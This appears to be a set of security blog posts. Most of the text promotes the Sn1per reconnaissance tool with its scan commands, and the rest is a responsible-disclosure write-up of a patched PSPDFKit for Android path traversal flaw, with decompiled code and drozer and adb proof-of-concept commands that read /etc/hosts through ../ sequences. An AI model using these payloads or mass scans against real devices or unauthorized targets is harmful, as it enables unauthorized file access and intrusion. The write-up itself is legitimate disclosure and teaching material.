Passive Attack Surface Reconnaissance

Passive Reconnaissance Techniques For Penetration Testing

As a top ranked bug bounty researcher and Sr. Penetration Tester, I’ve discovered some critical vulnerabilities without ever directly accessing or scanning the target in question. These vulnerabilities are typically found by querying 3rd party services to discover cached and historic URL’s from a target and searching interesting URL’s. In some cases, this has lead me to discover critical “0day” vulnerabilities in commercial security products, Corporate owned websites and online services. In this blog post, I’ll discuss the methodology and step-by-step process used to find these vulnerabilities and how we can leverage tools like Sn1per Professional to assist us.



Attack Surface Management With Sn1per Professional

Continuous Attack Surface Management (ASM) and reduction has become a crucial function for every organization to gain visibility of their perimeter security. Having the right tools and processes in place is vital to detecting new vulnerabilities before attackers do. In this blog post, we will outline the basic steps for discovering the attack surface with Sn1per Professional v9.0.


Sn1per Professional v9.0 Demo

Aftermath2020 #002 with @xer0dayz – Live Bug Bounty Recon with Sn1per Professional


0:00 – Basic stealth mode single domain recon with Sn1per Professional v8.0
5:00 – Leveraging built-in Sn1per Professional recon links to passively gather #OSINT
6:15 – Using InjectX fuzzer to fuzz dynamic URL’s (unreleased)
8:04 – Levaging Sn1per Professional’s Fuzzer Add-on to brute force files/directories (unreleased)
9:00 – More stealth mode single target recon with split panel/search/host jump features
11:20 – Manual scan analysis of discovered URL’s
16:20 – Levaging Sn1per Professional’s Fuzzer Add-on to brute force files/directories (unreleased)
17:35 – Use of Sn1per Professional’s host table filter
17:45 – Use of Sn1per Professional’s quick links to view websites in browser
18:52 – Use of Sn1per Professional’s built-in Google Dorks links to discover hidden content
19:20 – Levaging Sn1per Professional’s Fuzzer Add-on to brute force files/directories (unreleased)
22:22 – Using Burpsuite Professional JSLinkFinder plugin to analyze Javascript files
24:20 – Leveraging built-in Sn1per Professional recon links to passively gather #OSINT
25:54 – Discovering hidden/cached content via
29:55 – Use of Sn1per Professional’s built-in Notepad add-on to keep notes on workspace
30:37 – Use of Fofa to conduct recon on target domain
35:31 – Levaging Sn1per Professional’s Fuzzer Add-on to brute force files/directories with extensions (unreleased)
36:26 – Using Google dorks to discover content and URL’s
43:17 – Manual Javascript analysis from the command line
44:42 – Discovering pre-production and internal domains in Javascript files
53:18 – Digging deeper into hidden/discovered content on a target
57:14 – Discovering PayPal github repos in Javascript source
57:42 – Conducting basic github recon on PayPal developers for sensitive data


Bug Bounty Recon Like A Pro


In this blog post, I will cover the basic steps to performing bug bounty recon against large, open scoped programs and penetration tests.

If you’re like most starting out, this process can seem daunting and overwhelming depending on how many hosts you’re dealing with. Twitter for instance has 20,000+ subdomains and a HUGE attack surface to go through. How do you know where to focus your time? How do you keep track of which hosts you scanned and reviewed? These questions can quickly lead you spinning in circles, wasting valuable time while more experienced hunters get the gold. Luckily, there are tools and methodologies that can assist and make your life easier as a bug bounty hunter or penetration tester. This is where Sn1per comes in…

What is Sn1per?

Sn1per is an automated pentest reconnaissance scanner that can be used during penetration tests and bug bounties and to enumerate targets and scan for vulnerabilities. There are two versions of Sn1per available depending on your needs. Sn1per Community Edition (CE) is the open source scan engine that is maintained on Github ( Sn1per Professional is XeroSecurity’s premium reporting add on for Sn1per and is available exclusively from the XeroSecurity website (


Installation is extremely easy. Just clone the Github repo (git clone and run ./ from a Kali Linux OS. This will install all tools and dependencies which are used to collect recon info and scan for vulnerabilities.

Scoping your target

So we have Sn1per installed and we’ve recited “The Rifleman’s Creed” a few times, the next phase is scoping our target. This is fairly obvious but we need to carefully review the bug bounty or pentest scope which gives us legal permission to test without getting thrown in prison. If you find yourself getting outside the intended scope, you’ve been warned – This “could” land you in jail!.
Now that the legal disclaimer is out of the way, what’s the first step?

Tactical Reconnaissance & OSINT

The first step in your reconnaissance process should be enumerating all subdomains and hosts within the target scope. For this, we’re interested in any wildcard domains (ie. * In this case, it is up to the researcher to hunt for subdomains and hosts which fall within this target scope but haven’t been explicitly stated. For this, we will use sniper to actively and passively scan a target domain for subdomains via the -re switch and we’ll create a new workspace to store all our hosts via the -w switch. Additionally, we’ll also add the –osint switch to our scan to perform basic OSINT (Open Source Intelligence Gathering) searches on the target domain. This can reveal tons of useful information such as email addresses, public domains, documents, usernames, software used, whois info, reverse IP lookups, virtual hosts, etc. In addition, Sn1per will perform basic checks for subdomain hijacking and takeovers.
sniper -t --recon --osint -w workspace_alias
This will store a complete list of all subdomains discovered and sorted at the following location:

Calling In The Airstrike…


Now that we’ve enumerated all subdomains for the in-scope wildcard domain, we need to quickly enumerate all hosts with a high level flyover. This can be done by passing our host list from the previous step via the -f switch and running sniper in airstrike mode via the -m airstrike options. This will store all gathered data to our workspace and combine the data from all hosts scanned under /usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/. Some basic info gathered from this mode include: DNS, open ports, HTTP headers, SSL ciphers, web fingerprints, TCP banners, WAF detection and basic file/directory and passive URL discovery.
sniper -f /usr/share/sniper/loot/workspace/<WORKSPACE_ALIAS>/domains/domains-all-sorted.txt -m airstrike -w workspace


After the Sn1per finishes scanning all hosts in our workspace, Sn1per Professional gives us some high level info via the console for each host as shown below. This will help us get a high level visual of the attack surface based on which ports are open, interesting HTTP headers, page titles and DNS records. It will become very clear that if the host has no DNS or open ports, there probably isn’t much of an attack surface to dig into further. It’s best to focus on interesting ports (ie. port 21 (FTP), port 22 (SSH), 3306 (MySQL), etc.) and web targets with interesting headers (ie. Server: Apache Tomcat v7.0.0) may be vulnerable and have known exploit code available.

Professional Reporting Interface

After our report gets generated, we can see Sn1per enumerated and scanned 1268 unique hosts automatically. As a penetration tester, you can now sift through all the information contained in your workspace to begin looking for interesting hosts and potential vulnerabilities. To help us manage all this data, we will leverage Sn1per Professional for the next steps in the process. Sn1per Professional offers the following features to help make our lives a bit easier.


– Professional reporting interface.
– Slideshow for all gathered screenshots.
– Searchable and sortable DNS, IP and open port database.
– Quick links to online recon tools and Google hacking queries.
– Personalized notes field for each host.

Demo Video:

Slideshow For All Gathered Screenshots

From here, we can perform visual recon via the “Slideshow” feature in Sn1per Pro. This can reveal all sorts of potentially interesting hosts which can help identify which hosts need to be scanned further for more information.

Searchable/Sortable DNS, IP and Open Port Database

To supplement our surface level reconnaissance, we can also utilize the “Port List” feature which provides a widget of all subdomains, open ports, DNS and page titles. All data stored within this widget can then be sorted and searched for based on your needs (ie. If you’re looking for port 22/tcp (SSH), search for “22”. If you want to find all virtual hosts in the environment based on the same page title, enter the full page title (ie. “Overstock Cars”), etc. The possibilities here are endless but we can quickly find interesting hosts and ports or DNS records using this feature in Sn1per Professional.


This concludes part one of this series. This is by no means a comprehensive recon tutorial, but it should be enough to get you started in the process. Stay tuned for more recon tips and tricks for getting the most out of your bug bounty and pentest recon with Sn1per.


Exploiting Path Traversal in PSPDFKit for Android (2.3.3 – 2.8.0)



As part of my research into the Atlassian bug bounty program managed by BugCrowd (, I recently discovered a directory traversal vulnerability in PSPDFKit for Android 2.3.3 – 2.8.0. After announcing my discovery on Twitter (, I received a few tweets asking for a tutorial and PoC of my discoveries and decided to create a blog post to document it. This particular vulnerability was discovered in the Atlassian Jira Cloud application and was verified to be fixed in the latest release.

Technical Background

The Jira Cloud Android application ( is vulnerable to directory traversal via the following exported content provider: content:// This allows an attacker to view the local file system on the affected Android device from external 3rd party applications installed on the same device. To exploit this flaw, an attacker can create a malicious application which queries the content provider directly in order to retrieve specific files stored locally on the device. If the victim installs the malicious application, an attacker can read files stored locally on the device. Alternatively, the content provider can be queried directory via the Android debug bridge (ADB) and does not require “root” access.


To enumerate the Android application, I used reverse-apk ( which is a tool I wrote to reverse APK files. This revealed an exported content provider named com.pspdfkit.document.sharing.DocumentSharingProvider which means 3rd party apps on the same device can query the provider directly.

# reverse-apk
... SNIP ...
Displaying Content Providers in AndroidManifest.xml...
<provider android:authorities="" android:exported="true"
android:grantUriPermissions="true" android:name="com.pspdfkit.document.sharing.DocumentSharingProvider"/>
... SNIP ...


Next, I used Drozer to scan for common vulnerabilities such as SQL injection and directory traversal. This revealed a vulnerable content provider (content:// but did not detail how to exploit the flaw.

# drozer console --server connect
drozer Console (v2.3.4)
dz> run scanner.provider.traversal -a
Not Vulnerable:
Vulnerable Providers:
dz> run scanner.provider.traversal -a
Not Vulnerable:
Vulnerable Providers:

Source Code Analysis

Drozer seemed to indicate that the content provider was vulnerable to directory traversal so I decided to take a look at the source code to confirm for myself. This was accomplished by running reverse-apk and opening the affected file. This confirmed that the content provider accepts URI strings via the ParcelFileDescriptor method and reads the contents (, i);).

public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
if (uri.getPath() == null) {
throw new FileNotFoundException(uri + " has empty path.");
} else if (getContext() == null) {
throw new IllegalStateException("Context was null.");
} else {
try {
int i;
File file = new File(getSharedFileDirectory(getContext()), uri.getPath());
if ("r".equals(mode)) {
i = 268435456;
} else if ("w".equals(mode) || "wt".equals(mode)) {
i = 738197504;
} else if ("wa".equals(mode)) {
i = 704643072;
} else if ("rw".equals(mode)) {
i = 939524096;
} else if ("rwt".equals(mode)) {
i = 1006632960;
} else {
i = 0;
return, i);
} catch (IOException e) {
throw new FileNotFoundException(uri.toString() + " was not found.");


Now that I knew the content provider was vulnerable, I had to actually exploit this to do something useful. To do this, I used ADB (Android Debug Bridge) and Drozer (they essentially are the same thing and yield the same result..).

Drozer PoC

run content://
//.//..//.//..//.//..//.//..///etc/hosts localhost


adb shell content query --uri content://
//.//..//.//..//.//..//.//..//.//..///etc/hosts localhost


After discovering the flaw, I reported the issue to Atlassian via BugCrowd and the issue was triaged by a BugCrowd analyst. Unfortunately, Atlassian later came back and reported that this issue was a duplicate and noted that this was a known issue affecting PSPDFKit for Android and has since been patched. As a consolation, I figured this would make a good blog post and Atlassian was nice enough to allow me to disclose the details publicly. The original advisory for PSPDFKit can be found below.


Credit: [email protected]